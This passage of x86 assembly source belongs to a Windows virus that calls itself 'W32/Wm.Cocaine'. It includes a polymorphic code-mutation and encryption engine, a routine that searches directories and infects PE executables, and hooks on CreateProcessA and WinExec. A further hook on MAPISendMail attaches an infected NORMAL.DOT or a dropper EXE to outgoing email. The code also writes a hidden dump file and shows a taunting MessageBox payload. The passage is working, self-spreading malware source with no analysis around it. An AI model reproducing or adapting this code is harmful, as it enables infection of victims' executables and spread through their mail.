jae @@1
mov eax, 8
call random
add eax, 4
mov ecx, eax ;4-11 instructionz
@@0:
push ecx
lea esi, [ebp+(ofs gtable-ofs vcode)]
mov eax, (ofs egtable - ofs gtable)/4
call random
shl eax, 2
add esi, eax
lodsd
add eax, ebp
cmp by [ebp+(ofs lgarble-ofs vcode)], al
je @@2 ;same?
mov by [ebp+(ofs lgarble-ofs vcode)], al
call eax
@@2:
pop ecx
loop @@0
@@1:
dec by [ebp+(ofs recurse-ofs vcode)]
mov [esp], edi ;copy of edi in stack
popad
ret
garble endp
make_subs proc
cmp by [ebp+(ofs s_into-ofs vcode)], 0
jne @@1
cmp dwo [ebp+(ofs subs_index-ofs vcode)], MAX_SUBROUTINES
ja @@1
inc by [ebp+(ofs s_into-ofs vcode)] ;mark into
mov eax, [ebp+(ofs subs_index-ofs vcode)]
inc dwo [ebp+(ofs subs_index-ofs vcode)]
mov ecx, 6
cdq
mul ecx
lea esi, [ebp+eax+(ofs subs_table-ofs vcode)]
mov al, 0e9h
stosb
stosd
push edi ;[esp]-4 = skip_jmp
call garble
mov [esi], edi ;where sub is
mov eax, 5
call random ;number of paramz pushed
mov [esi.4], al ;by caller
mov eax, 5
call random ;number of local variables
mov [esi.5], al
test eax, eax ;if not local variables, then
jz @@0 ;dont alloc stack
mov ebx, eax
shl ebx, 2 ;displacement in dwords
mov al, 0c8h
stosb ;enter
mov eax, ebx
stosd ;size/deep
dec edi
jmp @@2
@@0:
mov al, 55h
stosb ;push ebp
mov ax, 0ec8bh
stosw ;mov ebp, esp
@@2:
push dwo [ebp+(ofs reg32-ofs vcode)] ;save reg state
mov by [ebp+(ofs _pusha-ofs vcode)], 0 ;no use pusha at start
mov eax, 3
call random
test eax, eax
je @@4 ;will use PUSHA!
@@10:
call random0 ;choose regs
and eax, 11111111b
or eax, 00110000b ;set EBP and ESP too
cmp al, -1
jz @@10
mov [ebp+(ofs reg32-ofs vcode)], eax
and eax, 11001111b
not al ;free regs are set bits now!
test eax, eax
jz @@10
@@5:
bsf edx, eax
jz @@6 ;no more regs free?
btc eax, edx ;clear it
cmp dl, 4
je @@5
cmp dl, 5 ;ebp-esp dont need be saved
je @@5
push eax
mov eax, edx ;get position
or al, 50h
stosb ;store as PUSH
pop eax
jmp @@5
@@4:
mov by [ebp+(ofs _pusha-ofs vcode)], -1 ;pusha used!
mov dwo [ebp+(ofs reg32-ofs vcode)], 00110000b
mov al, 60h ;set EBP and ESP as used
stosb ;pusha
@@6:
movzx eax, by [esi.4]
mov [ebp+(ofs lparm-ofs vcode)], eax
movzx eax, by [esi.5]
mov [ebp+(ofs lvars-ofs vcode)], eax ;set paramz to mem write/read
call garble
call garble
call garble
xor eax, eax
mov [ebp+(ofs lparm-ofs vcode)], eax ;disable mem write/read
mov [ebp+(ofs lvars-ofs vcode)], eax
mov al, [ebp+(ofs _pusha-ofs vcode)]
inc al
jnz @@7 ;well, do individual POPs
mov al, 61h
stosb ;POPA
jmp @@8
@@7:
mov eax, [ebp+(ofs reg32-ofs vcode)]
and eax, 11001111b
not al ;free regs are set bits now!
@@9:
bsr edx, eax
jz @@8 ;no more regs free?
btc eax, edx ;clear it
cmp dl, 4
je @@9
cmp dl, 5 ;ebp-esp dont need be restored
je @@9
push eax
mov eax, edx ;get position
or al, 58h
stosb ;store as POP this time
pop eax
jmp @@9
@@8:
pop dwo [ebp+(ofs reg32-ofs vcode)] ;restore reg state
@@3:
mov al, 0c9h
stosb ;leave
mov al, 0c2h
stosb ;ret
movzx eax, by [esi.4]
shl eax, 2
test eax, eax
jz @@a
stosw ;clean params
jmp @@b
@@a:
mov by [edi-1], 0c3h ;no paramz, use RETN
@@b:
call garble
pop esi
mov ecx, edi
sub ecx, esi ;distance
mov [esi-4], ecx ;patch jmp
dec by [ebp+(ofs s_into-ofs vcode)]
@@1:
ret
make_subs endp
make_call proc
cmp by [ebp+(ofs s_into-ofs vcode)], 0
jne @@1 ;cant call while creating sub
mov eax, [ebp+(ofs subs_index-ofs vcode)]
test eax, eax
jz @@1
call random ;choose one of the subs ready
mov ecx, 6
cdq
mul ecx
lea esi, [ebp+eax+(ofs subs_table-ofs vcode)]
movzx ecx, by [esi.4]
jecxz @@2 ;how much paramz it need?
@@3:
call gar
or al, 50h ;push paramz
stosb
loop @@3
@@2:
mov al, 0e8h
stosb ;build call
mov eax, dwo [esi]
sub eax, edi
sub eax,4
stosd ;store displacement
@@1:
ret
make_call endp
lea_dword proc
mov al, 8dh
stosb
call get32free
shl eax, 3
push eax
call gar
pop edx
or eax, edx
or al, 80h
stosb
call random0
stosd
ret
lea_dword endp
math_byte proc
mov eax, 8
call random
shl eax, 3
or eax, 1000000011000000b ;make math operation
push eax
call get8free
pop edx
jc @@1
or eax, edx
xchg al, ah
stosw
call random0
stosb ;byte
@@1:
ret
math_byte endp
math_word proc
mov ax, 8166h
stosw
call _math_imm
stosw
ret
math_word endp
math_dword proc
mov al, 81h
stosb
call _math_imm
stosd
ret
math_dword endp
_math_imm proc
mov eax, 8
call random
shl eax, 3
or al, 11000000b
push eax
call get32free
pop edx
or eax, edx ;patch reg into
stosb
call random0
ret
_math_imm endp
push_pop proc
call gar
or al, 50h
stosb
call garble ;recurse into
call get32free
or al, 58h
stosb
ret
push_pop endp
jmpcn proc
mov eax, 0fh
call random
or ax, 0f80h ;jcc near
xchg al, ah
stosw
stosd
push edi
call garble ;recurse
pop esi
mov eax, edi
sub eax, esi
mov dwo [esi-4], eax ;fix jcc
ret
jmpcn endp
jmpcs proc
mov eax, 0fh
call random
or al, 70h ;make jmp conditional
stosw
push edi
call garble ;recurse
pop esi
push edi
mov eax, esi
xchg eax, edi
sub eax, edi
mov by [esi-1], al ;fix jcc
or al, al
jns @@1 ;jmp destiny too far?
mov edi, esi
dec edi
dec edi
call one_byte ;replace with 2 byte instr
call one_byte
@@1:
pop edi
ret
jmpcs endp
jmpn proc
mov al, 0e9h
stosb
mov eax, JMP_MAX
call random
inc eax
mov ecx, eax
stosd
jmp _shit
jmpn endp
jmps proc
mov eax, JMP_MAX
call random
inc eax
mov ecx, eax
mov ah, 0ebh
xchg al, ah
stosw
movzx eax, ah
_shit:
call random0 ;ecx bytes of shit
stosb
loop _shit
ret
jmps endp
movr_byte proc
call gar
push eax
call get8free
jnc @@1
pop eax
ret
@@1:
push eax
mov al, 08ah
jmp _reg_reg
movr_byte endp
movr_word proc
mov al, 66h ;word-size prefix
stosb
movr_word endp
movr_dword proc
call gar
push eax
call get32free
push eax
mov al, 08bh
_reg_reg:
stosb
pop eax ;destino
pop edx ;source
shl eax, 3
or eax, edx
or eax, 11000000b
stosb
ret
movr_dword endp
mov_dword proc
call get32free
or al, 0b8h
stosb
call random0
stosd
ret
mov_dword endp
mov_word proc
mov al, 66h
stosb
call get32free
or al, 0b8h
stosb
call random0
stosw
ret
mov_word endp
mov_byte proc
call get8free
jc @@1
or al, 0b0h
stosb
call random0
stosb
@@1:
ret
mov_byte endp
one_byte proc
mov eax, 5
call random
lea ebx, [ebp+(ofs one_byte_table-ofs vcode)]
xlat
stosb
ret
one_byte endp
inc_dec proc
call get32free
add al, 40h
call random_f
js @@1
or al, 01000b ;inc/dec
@@1:
stosb
ret
inc_dec endp
mov_zs_x proc
call random0
mov eax, 0b60fh
js @@1
mov ah, 0beh ;z/s
@@1:
adc ah, 0 ;16/8
stosw
call gar
push eax
call get32free
shl eax, 3
pop edx
or eax, edx
or al, 0c0h
stosb
ret
mov_zs_x endp
one_byte_table equ this byte
std
clc
cmc
cld
std
crypt_table equ this byte
db 080h, 030h, 034h ;xor
db 0f6h, 010h, 0f6h ;not
db 080h, 000h, 02ch ;add
db 080h, 028h, 004h ;sub
gtable equ this byte
dd ofs jmpcn-ofs vcode
dd ofs jmpcs-ofs vcode
dd ofs jmpn-ofs vcode
dd ofs jmps-ofs vcode
dd ofs one_byte-ofs vcode
dd ofs push_pop-ofs vcode
dd ofs push_pop-ofs vcode
dd ofs push_pop-ofs vcode
dd ofs push_pop-ofs vcode
dd ofs inc_dec-ofs vcode
dd ofs inc_dec-ofs vcode
dd ofs mov_zs_x-ofs vcode
dd ofs mov_zs_x-ofs vcode
dd ofs math_word-ofs vcode
dd ofs math_word-ofs vcode
dd ofs movr_word-ofs vcode
dd ofs movr_word-ofs vcode
dd ofs mov_word-ofs vcode
dd ofs mov_word-ofs vcode
dd ofs movr_byte-ofs vcode
dd ofs movr_byte-ofs vcode
dd ofs movr_byte-ofs vcode
dd ofs math_byte-ofs vcode
dd ofs math_byte-ofs vcode
dd ofs math_byte-ofs vcode
dd ofs mov_byte-ofs vcode
dd ofs mov_byte-ofs vcode
dd ofs mov_byte-ofs vcode
dd ofs math_dword-ofs vcode
dd ofs math_dword-ofs vcode
dd ofs math_dword-ofs vcode
dd ofs math_dword-ofs vcode
dd ofs math_dword-ofs vcode
dd ofs math_dword-ofs vcode
dd ofs mov_dword-ofs vcode
dd ofs mov_dword-ofs vcode
dd ofs mov_dword-ofs vcode
dd ofs mov_dword-ofs vcode
dd ofs mov_dword-ofs vcode
dd ofs mov_dword-ofs vcode
dd ofs movr_dword-ofs vcode
dd ofs movr_dword-ofs vcode
dd ofs movr_dword-ofs vcode
dd ofs movr_dword-ofs vcode
dd ofs movr_dword-ofs vcode
dd ofs movr_dword-ofs vcode
dd ofs lea_dword-ofs vcode
dd ofs lea_dword-ofs vcode
dd ofs lea_dword-ofs vcode
dd ofs lea_dword-ofs vcode
dd ofs lea_dword-ofs vcode
dd ofs lea_dword-ofs vcode
dd ofs mov_dword-ofs vcode
dd ofs mov_dword-ofs vcode
dd ofs mov_dword-ofs vcode
dd ofs mov_dword-ofs vcode
dd ofs mov_dword-ofs vcode
dd ofs mov_dword-ofs vcode
dd ofs movr_dword-ofs vcode
dd ofs movr_dword-ofs vcode
dd ofs movr_dword-ofs vcode
dd ofs movr_dword-ofs vcode
dd ofs movr_dword-ofs vcode
dd ofs movr_dword-ofs vcode
dd ofs lea_dword-ofs vcode
dd ofs lea_dword-ofs vcode
dd ofs lea_dword-ofs vcode
dd ofs lea_dword-ofs vcode
dd ofs lea_dword-ofs vcode
dd ofs lea_dword-ofs vcode
egtable equ this byte ;end of in-memory encripted part
title1 db 'W32/Wm.Cocaine', 0
text0 db 'Your life burn faster, obey your master...', 0
text1 db 'Chop your breakfast on a mirror...', 0
text2 db 'Veins that pump with fear, sucking darkest clear...', 0
text3 db 'Taste me you will see, more is all you need...', 0
text4 db 'I will occupy, I will help you die...', 0
text5 db 'I will run through you, now I rule you too...', 0
text6 db "Master of Puppets, I'm pulling your strings...", 0
text_table equ this byte
dd ofs text0-ofs vcode
dd ofs text1-ofs vcode
dd ofs text2-ofs vcode
dd ofs text3-ofs vcode
dd ofs text4-ofs vcode
dd ofs text5-ofs vcode
dd ofs text6-ofs vcode
Payload:
nop ;on/off switch
sub ecx, ecx
push ecx
lea eax, [ebp+(ofs title1-ofs vcode)]
push eax
mov eax, 7
call random
mov eax, [ebp+(ofs text_table-ofs vcode)+eax*4]
add eax, ebp
push eax ;silly MessageBox payload
push ecx
call [ebp+(ofs _MessageBoxA-ofs vcode)]
ret
kernel db 'KERNEL32', 0
user db 'USER32', 0
mapi db 'MAPI32', 0
align 4
sGetProcAddress db 'GetProcAddress', 0 ;APIs from kernel32.dll that
sGetModuleHandle db 'GetModuleHandleA', 0 ;we need
sCreateProcessA db 'CreateProcessA', 0
sCreateFileA db 'CreateFileA', 0
sWinExec db 'WinExec', 0
sCloseHandle db 'CloseHandle', 0 ;api names, related to other 2
sLoadLibraryA db 'LoadLibraryA', 0
sFreeLibrary db 'FreeLibrary', 0
sCreateFileMappingA db 'CreateFileMappingA', 0
sMapViewOfFile db 'MapViewOfFile', 0
sUnmapViewOfFile db 'UnmapViewOfFile', 0
sFindFirstFileA db 'FindFirstFileA', 0
sFindNextFileA db 'FindNextFileA', 0
sFindClose db 'FindClose', 0
sSetEndOfFile db 'SetEndOfFile', 0
sVirtualAlloc db 'VirtualAlloc', 0
sVirtualFree db 'VirtualFree', 0
sGetSystemTime db 'GetSystemTime', 0
sGetWindowsDirectoryA db 'GetWindowsDirectoryA', 0
sGetSystemDirectoryA db 'GetSystemDirectoryA', 0
sGetCurrentDirectoryA db 'GetCurrentDirectoryA', 0
sSetFileAttributesA db 'SetFileAttributesA', 0
sSetFileTime db 'SetFileTime', 0
sExitProcess db 'ExitProcess', 0
sGetCurrentProcess db 'GetCurrentProcess', 0
sWriteProcessMemory db 'WriteProcessMemory',0
sWriteFile db 'WriteFile', 0
sDeleteFileA db 'DeleteFileA', 0
sSleep db 'Sleep', 0
sCreateThread db 'CreateThread', 0
sGetFileSize db 'GetFileSize', 0
sSetFilePointer db 'SetFilePointer', 0
sMessageBoxA db 'MessageBoxA', 0 ;USER32 functionz
sFindWindowA db 'FindWindowA', 0
sPostMessageA db 'PostMessageA', 0
sMAPISendMail db 'MAPISendMail', 0
ConsultKey proc
call @@1
@@1v dd 0
@@1:
push 000F003Fh ;KEY_ALL_ACCESS
push 0
push eax
push 80000001H
what_key equ dwo $-4
call [ebp+(ofs _RegOpenKeyEx-ofs vcode)]
test eax, eax
jnz @@0
call @@3
dd 0
@@3:
mov edx, [esp]
mov dwo [edx], MAX_PATH
lea eax, [ebp+(ofs directory-ofs vcode)]
mov esi, eax
mov [eax], eax
push eax
push 0
push 0
call @@4
db 0
@@4:
push dwo [ebp+(ofs @@1v-ofs vcode)]
call [ebp+(ofs _RegQueryValueEx-ofs vcode)]
push dwo [ebp+(ofs @@1v-ofs vcode)]
call [ebp+(ofs _RegCloseKey-ofs vcode)] ;close key
@@0:
ret
ConsultKey endp
align 4
k32_names equ this byte
dd (ofs sCreateProcessA-ofs vcode)
dd (ofs sCreateFileA-ofs vcode);these are relative pointerz
dd (ofs sWinExec-ofs vcode) ;to namez... zero end list
dd (ofs sCloseHandle-ofs vcode)
dd (ofs sLoadLibraryA-ofs vcode)
dd (ofs sFreeLibrary-ofs vcode)
dd (ofs sCreateFileMappingA-ofs vcode)
dd (ofs sMapViewOfFile-ofs vcode)
dd (ofs sUnmapViewOfFile-ofs vcode)
dd (ofs sFindFirstFileA-ofs vcode)
dd (ofs sFindNextFileA-ofs vcode)
dd (ofs sFindClose-ofs vcode)
dd (ofs sSetEndOfFile-ofs vcode)
dd (ofs sVirtualAlloc-ofs vcode)
dd (ofs sVirtualFree-ofs vcode)
dd (ofs sGetSystemTime-ofs vcode)
dd (ofs sGetWindowsDirectoryA-ofs vcode)
dd (ofs sGetSystemDirectoryA-ofs vcode)
dd (ofs sGetCurrentDirectoryA-ofs vcode)
dd (ofs sSetFileAttributesA-ofs vcode)
dd (ofs sSetFileTime-ofs vcode)
dd (ofs sExitProcess-ofs vcode)
dd (ofs sGetCurrentProcess-ofs vcode)
dd (ofs sWriteProcessMemory-ofs vcode)
dd (ofs sWriteFile-ofs vcode)
dd (ofs sDeleteFileA-ofs vcode)
dd (ofs sSleep-ofs vcode)
dd (ofs sCreateThread-ofs vcode)
dd (ofs sGetFileSize-ofs vcode)
dd (ofs sSetFilePointer-ofs vcode)
dd 0
dd (ofs sMessageBoxA-ofs vcode)
dd (ofs sFindWindowA-ofs vcode)
dd (ofs sPostMessageA-ofs vcode)
dd 0
DeleteShitFile proc
call delta
mov ebx, [esp+4]
push 80h
push ebx
call [ebp+(ofs _SetFileAttributesA-ofs vcode)]
test eax, eax
jz @@1
push ebx
call [ebp+(ofs _DeleteFileA-ofs vcode)]
@@1:
ret 4
DeleteShitFile endp
NewMAPISendMail proc
push esp ;original MAPISendMail
pushad
call delta
lea eax, [ebp+(ofs mapi-ofs vcode)]
push eax
call [ebp+(ofs _GetModuleHandle-ofs vcode)]
lea ecx, [ebp+(ofs sMAPISendMail-ofs vcode)]
push ecx
push eax
call [ebp+(ofs _GetProcAddress-ofs vcode)]
mov [esp+(8*4)], eax ;return address=MAPISendMail
mov edi, [esp+(12*4)] ;MAPI Struct
cmp dwo [edi.nFileCount], 0 ;file attached?
jnz @@3
inc dwo [edi.nFileCount] ;set 1 attachments
lea ebx, [ebp+(ofs MF-ofs vcode)]
mov [edi.lpFiles], ebx
sub eax, eax
mov edi, ebx
mov ecx, 6
rep stosd ;esi=file structure
call OpenAncev
jc @@4 ;file dont exists, binary send
call GetTemplateDir
@@aaa:
lodsb
test al, al
jnz @@aaa
call @@aab
ndot db '\NORMAL.DOT', 0
@@aab:
pop edi
xchg edi, esi
dec edi
@@aac:
lodsb
stosb
test al, al ;we'll send infected NORMAL.DOT
jnz @@aac
lea esi, [ebp+(ofs directory-ofs vcode)]
push 80h
push esi
call [ebp+(ofs _SetFileAttributesA-ofs vcode)]
test eax, eax
jz @@4 ;file exists?
mov eax, esi
mov edx, 'COD'
jmp @@5
@@4:
call CreateDropper
mov eax, [ebp+(ofs mm_on_off-ofs vcode)]
push eax ;buffer
mov eax, [ebp+(ofs fsizel-ofs vcode)]
push eax ;size
lea edi, [ebp+(ofs rbuf-ofs vcode)]
mov ebx, edi
call @@111
shitfile db 'C:\ENIACOC.SYS', 0
@@111:
pop esi
@@111a:
lodsb
stosb
test al, al
jnz @@111a
push ebx ;name
mov dwo [ebp+(ofs wd_att-ofs vcode)], 82h
call WriteDump ;hidden dump
push 00004000h+00008000h
push 0
push dwo [ebp+(ofs mm_on_off-ofs vcode)]
call [ebp+(ofs _VirtualFree-ofs vcode)]
lea eax, [ebp+(ofs rbuf-ofs vcode)]
mov edx, 'EXE'
@@5:
lea edi, [ebp+(ofs MF-ofs vcode)]
mov [edi.lpszPathName], eax ;set file to send
lea esi, [ebp+(ofs rbuf+MAX_PATH-ofs vcode)]
mov [edi.lpszFileName], esi
xchg edi, esi
mov eax, 8
call random
inc eax
inc eax
inc eax
mov ecx, eax
@@a:
mov eax, 23
call random
add al, 'A'
stosb
loop @@a
mov al, '.'
stosb
mov eax, edx
stosd
@@3:
mov dwo [ebp+(ofs mm_on_off-ofs vcode)], 0
popad
ret
NewMAPISendMail endp
NewCreateProcessA proc
push esp ;new handler for CreateProcessA
pushad
call CheckName
call delta
mov eax, [ebp+(ofs _CreateProcessA-ofs vcode)]
mov [esp+(7*4)+4], eax
popad
ret
NewCreateProcessA endp
RestoreChunkz db FALSE
NewWinExec proc
push esp ;new handler for WinExec
pushad
call CheckName
call delta
mov eax, [ebp+(ofs _WinExec-ofs vcode)]
mov [esp+(7*4)+4], eax
popad
ret
NewWinExec endp
ProcessDir proc
pushad
lea edi, [ebp+(ofs directory-ofs vcode)];edi=dir to process
add edi, eax ;eax=size of dir
lea esi, [ebp+(ofs FileMask-ofs vcode)]
movsd
movsd ;copy *.* mask
lea eax, [ebp+(ofs find_data-ofs vcode)]
push eax
lea eax, [ebp+(ofs directory-ofs vcode)]
push eax
call [ebp+(ofs _FindFirstFileA-ofs vcode)]
inc eax
jz @@0 ;no file found?
dec eax
mov [ebp+(ofs search_handle-ofs vcode)], eax
@@1:
pushad
lea esi, [ebp+(ofs directory-ofs vcode)]
sub eax, eax
mov edx, esi
@@3:
lodsb
cmp al, '\' ;search last slash
jne @@5
mov edx, esi ;update slash position
@@5:
test al, al
jnz @@3
lea esi, [ebp+(ofs filename-ofs vcode)]
mov edi, edx
@@4:
lodsb
cmp al, 'V'
je @@6
cmp al, 'v'
je @@6
cmp al, '0'
jb @@4a
cmp al, '9'
jbe @@6
@@4a:
stosb
test al, al ;copy name to path
jnz @@4
mov eax, dwo [edi-4]
or eax, 202020h
not eax
xor eax, not 'exe'
jz @@7
xor eax, ((not 'rcs')xor(not 'exe'))
jnz @@6 ;tricky, isnt? :)
@@7:
call Infect
@@6: ;process it
popad
lea eax, [ebp+(ofs find_data-ofs vcode)]
push eax
mov eax, [ebp+(ofs search_handle-ofs vcode)]
push eax
call [ebp+(ofs _FindNextFileA-ofs vcode)]
test eax, eax ;no more files in this dir?
jne @@1
@@2:
push dwo [ebp+(ofs search_handle-ofs vcode)]
call [ebp+(ofs _FindClose-ofs vcode)] ;close search
@@0:
popad
ret
ProcessDir endp
peh_machine = 4
peh_nosections = 6
peh_ntheader = 20
peh_flags = 22
peh_initdata = 32
peh_entrypoint = 40
peh_imagebase = 52
peh_imagesize = 80
peh_chksum = 88
peh_reloc1 = 160
peh_reloc2 = 164
seh_rvasz = 8
seh_rva = 12
seh_rawsz = 16
seh_raw = 20
seh_attr = 36
Infect proc ;infect PE filez
mov eax, [ebp+(ofs seed-ofs vcode)]
mov [ebp+(ofs pseed-ofs vcode)], eax
mov ecx, DIV_VALUE
call set_new_eh
mov esp,[esp+8] ;fix stack
_remove_seh:
jmp remove_seh
db 0EAh
set_new_eh:
sub edx, edx
push dwo fs:[edx]
mov fs:[edx], esp ;set SEH
mov by [ebp+(ofs inf?-ofs vcode)], dl
cmp [ebp+(ofs fsizeh-ofs vcode)], edx
jne _remove_seh ;too big?
mov eax, [ebp+(ofs fsizel-ofs vcode)]
cmp dwo [ebp+(ofs mm_on_off-ofs vcode)], 0
jnz @@5 ;skip size check for droppers
test eax, eax
jz @@5a
cmp eax, 16*1024
jbe _remove_seh ;smaller than 16kb?
@@5:
div ecx
test edx, edx ;padded to 101 boundary?
jz _remove_seh
@@5a:
call MapFile ;map file
mov ecx, eax
mov ebx, eax
jecxz _remove_seh ;error mapping
mov [ebp+(ofs map@-ofs vcode)], eax
cmp wo [ecx], 'ZM' ;EXE file?
jne @@0
cmp wo [ecx+18h], 40h
jne @@0
mov edi, [ecx+3ch]
add edi, ecx
mov [ebp+(ofs pe_header-ofs vcode)], edi
cmp dwo [edi], 'EP' ;PE EXE file?
jne @@0
cmp wo [edi+peh_machine], 014Ch ;i386?
jne @@0
movzx eax, wo [edi+peh_flags]
not al
test eax, 2002h
jnz @@0 ;isnt DLL? is executable?
mov esi, edi
movzx ecx, wo [edi+peh_nosections]
cmp ecx, 3
jb @@0 ;too few sections
dec ecx
mov eax, ecx
shl eax, 3
shl ecx, 5
add eax, ecx
movzx ecx, wo [edi+peh_ntheader]
add eax, 24
add eax, ecx ;esi=pe header
add edi, eax ;edi=section header
bt dwo [edi.seh_attr], 6 ;must be init data
jnc @@0
pushad
mov eax, [esi+peh_entrypoint]
mov [ebp+(ofs old_eip-ofs vcode)], eax ;copy entrypoint
mov edi, esi
movzx ecx, wo [edi+peh_ntheader]
add ecx, 24
add edi, ecx ;edi=first section header
mov eax, [edi+seh_rva]
mov [ebp+(ofs sRVA-ofs vcode)], eax
mov eax, [edi+seh_rawsz]
mov [ebp+(ofs RawSize-ofs vcode)], eax ;set vars for branch_entry
mov ecx, [esi+132]
mov eax, [edi+seh_rva]
add eax, [edi+seh_rvasz]
mov ebx, [esi+128]
sub eax, ebx
jc @@not_in_1st ;IT start after end of 1st sec
cmp ecx, eax
ja @@set_it
xchg eax, ecx
jmp @@set_it
@@not_in_1st:
sub ecx, ecx
@@set_it:
mov [ebp+(ofs it_size-ofs vcode)], ecx
push 00000040h
push 00002000h+00001000h+00100000h
push 32*1024
push 0
call [ebp+(ofs _VirtualAlloc-ofs vcode)]
mov [ebp+(ofs buffer2-ofs vcode)], eax
push 00000040h
push 00002000h+00001000h+00100000h
push 32*1024
push 0
call [ebp+(ofs _VirtualAlloc-ofs vcode)]
mov [ebp+(ofs buffer1-ofs vcode)], eax ;alloc 2 bufferz for poly
mov edi, eax
mov esi, ebp
mov ecx, vsize
rep movsb ;init first buffer
popad
lea eax, [ebp+(ofs kernel-ofs vcode)] ;search in kernel32
mov [ebp+(ofs dll_name-ofs vcode)], eax
lea eax, [ebp+(ofs sGetProcAddress-ofs vcode)]
call SearchIT
push eax ;push GetProcAdress
lea eax, [ebp+(ofs sGetModuleHandle-ofs vcode)]
call SearchIT
push eax ;push GetModuleHandleA
lea eax, [ebp+(ofs sCreateProcessA-ofs vcode)]
call SearchIT
push eax ;push CreateProcessA
lea eax, [ebp+(ofs sWinExec-ofs vcode)]
call SearchIT
push eax ;push WinExec
lea eax, [ebp+(ofs mapi-ofs vcode)] ;search in mapi32
mov [ebp+(ofs dll_name-ofs vcode)], eax
lea eax, [ebp+(ofs sMAPISendMail-ofs vcode)]
call SearchIT
push eax ;push MAPISendMail
sub ecx, ecx
mov edx, [edi+seh_rva]
add edx, [edi+seh_rawsz] ;rva+raw size=ep
mov [ebp+(ofs ep-ofs vcode)], edx
mov ecx, [esi+peh_imagebase]
add edx, ecx ;ep+base=delta run
mov eax, [esi+peh_entrypoint]
mov esi, [ebp+(ofs buffer1-ofs vcode)]
mov edi, [ebp+(ofs buffer2-ofs vcode)]
mov [esi+(ofs _delta-ofs vcode)], edx ;set delta in copy
mov [esi+(ofs _base-ofs vcode)], ecx
sub eax, [ebp+(ofs ep-ofs vcode)]
sub eax, 4+(ofs host_entry-ofs vcode)
mov [esi+(ofs host_entry-ofs vcode)], eax ;set entrypoint in copy
pop eax
mov [esi+(ofs OldMAPISendMail-ofs vcode)], eax
pop eax
mov [esi+(ofs OldWinExec-ofs vcode)], eax
pop eax
mov [esi+(ofs OldCreateProcessA-ofs vcode)], eax
pop eax
mov [esi+(ofs OldGetModuleHandleA-ofs vcode)], eax
pop eax
mov [esi+(ofs OldGetProcAddress-ofs vcode)], eax
mov by [esi+(ofs RestoreChunkz-ofs vcode)], FALSE
cmp dwo [ebp+(ofs RawSize-ofs vcode)], MIN_RAW
jb @@a
pushad
lea edi, [esi+(ofs rbuf-ofs vcode)] ;start of restoration table
push edi
mov ecx, (MAX_BRANCH*(128+4+4))/4
@@be0:
call random0 ;fill buffer with garbage
stosd
loop @@be0
sub eax, eax
mov [ebp+(ofs reg32-ofs vcode)], eax ;init internal vars
mov [ebp+(ofs lparm-ofs vcode)], eax
mov [ebp+(ofs lvars-ofs vcode)], eax
mov [ebp+(ofs subs_index-ofs vcode)], eax
mov [ebp+(ofs s_into-ofs vcode)], eax ;allow call
mov by [ebp+(ofs recurse-ofs vcode)], MAX_RECURSION-2
pop edi
mov eax, [ebp+(ofs old_eip-ofs vcode)] ;first chunk at
sub ecx, ecx ;counter
@@be1:
inc ecx ;chunk count
stosd ;starting RVA
stosd ;(make space for size)
call virtual2physical_
or eax, eax
jz @@fux0red
mov esi, eax
add esi, [ebp+(ofs map@-ofs vcode)]
push ecx
mov ecx, 128
push esi edi
rep movsb ;copy bytes at chunk
pop esi edi
pop ecx
lea ebx, [edi-5]
call crypt_poly
call garble ;make junk
call crypt_poly
mov [esi-4], edi ;(destine
sub [esi-4], ebx ;- previous destine(b4 junk))
;==size
mov al, 0e9h
stosd
stosb ;make JMP
pushad ;choose a suitable EIP for next
@@ce0: ;chunk(not overlapping)
mov eax, [ebp+(ofs RawSize-ofs vcode)]
sub eax, 12345678h
it_size equ dwo $-4
call random
add eax, [ebp+(ofs sRVA-ofs vcode)] ;eip=rnd(rva)+base
sub edx, edx
sub ebx, ebx ;init ok_counter,checked_counter
lea edi, [ebp+(ofs rbuf-ofs vcode)]
@@ce1:
mov esi, [edi]
add esi, [edi+4] ;entrypoint is above the end(point+sz)
cmp eax, esi ;last one, so, is valid(for dis entry)
ja @@ce3
mov esi, [edi] ;entrypoint is below current one - 129
sub esi, 129 ;so, it have enought room to grown, ok
cmp eax, esi
jnb @@ce2
@@ce3:
inc edx ;this one is ok
@@ce2:
add edi, [edi+4] ;update pointer to next chunk info
add edi, 4*2
inc ebx
cmp ecx, ebx ;all entries checked? no, continue
jne @@ce1
cmp ecx, edx ;eip allowed for all our entries?
jne @@ce0
mov [esp+(7*4)], eax ;fix eax(stack)
popad
push eax
call virtual2physical_
add eax, [ebp+(ofs map@-ofs vcode)]
mov ebx, edi
sub eax, ebx ;calc distance between chunks
mov [edi-4], eax ;patch JMP
lea eax, [edi-4] ;last patcheable jump
sub eax, [ebp+(ofs map@-ofs vcode)]
mov [ebp+(ofs patch_jump-ofs vcode)], eax
mov edi, esi
add edi, [edi-4] ;edi(table)=edi+2 dwords+junk
;(cut excess copied bytes)
pop eax
cmp ecx, MAX_BRANCH ;process next chunk
jb @@be1
popad
mov by [esi+(ofs RestoreChunkz-ofs vcode)], TRUE
@@a:
pushad
mov edi, esi
mov eax, [ebp+(ofs key1-ofs vcode)]
mov ecx, (ofs dec_end_code-ofs vcode)/4
@@loop1:
xor [edi], eax ;do 2nd loop(internal)
scasd
add eax, [ebp+(ofs key2-ofs vcode)]
loop @@loop1
popad
mov eax, (ofs DecriptInit-ofs vcode) ;where our code get control
mov ecx, vsize
call mutate ;encript
mov by [ebp+(ofs inf?-ofs vcode)], -1 ;set continue infecting
mov [ebp+(ofs polybuffer-ofs vcode)], edi
add [ebp+(ofs ep-ofs vcode)], eax ;add poly entry to file entry
cmp ecx, msize ;if poly decriptorz dont fill
jnb @@3 ;bufferz, make it bufsize long
mov ecx, msize
@@3:
mov [ebp+(ofs tamanho-ofs vcode)], ecx
@@0:
call UnmapFile
@@1:
movzx eax, by [ebp+(ofs inf?-ofs vcode)]
or eax, eax
mov by [ebp+(ofs inf?-ofs vcode)], 0 ;continue processing?
jz remove_seh
mov eax, [ebp+(ofs tamanho-ofs vcode)]
add eax, [ebp+(ofs fsizel-ofs vcode)]
call AlignD ;round mapsize to infected
mov [ebp+(ofs fsizel-ofs vcode)], eax ;mark
call MapFile
or eax, eax ;error mapping(all is fux0red)
jz @@1
mov ebx, eax
mov [ebp+(ofs map@-ofs vcode)], eax
add eax, [eax+3ch]
mov esi, eax
mov edi, eax
mov [ebp+(ofs pe_header-ofs vcode)], edi
movzx ecx, wo [esi+peh_nosections]
dec ecx
mov eax, ecx
shl eax, 3
shl ecx, 5
add eax, ecx
movzx ecx, wo [esi+peh_ntheader]
add eax, ecx
sub ecx, ecx ;esi=pe header
add eax, 24 ;ebx=map base
add edi, eax ;edi=last section header
mov [esi+peh_reloc1], ecx
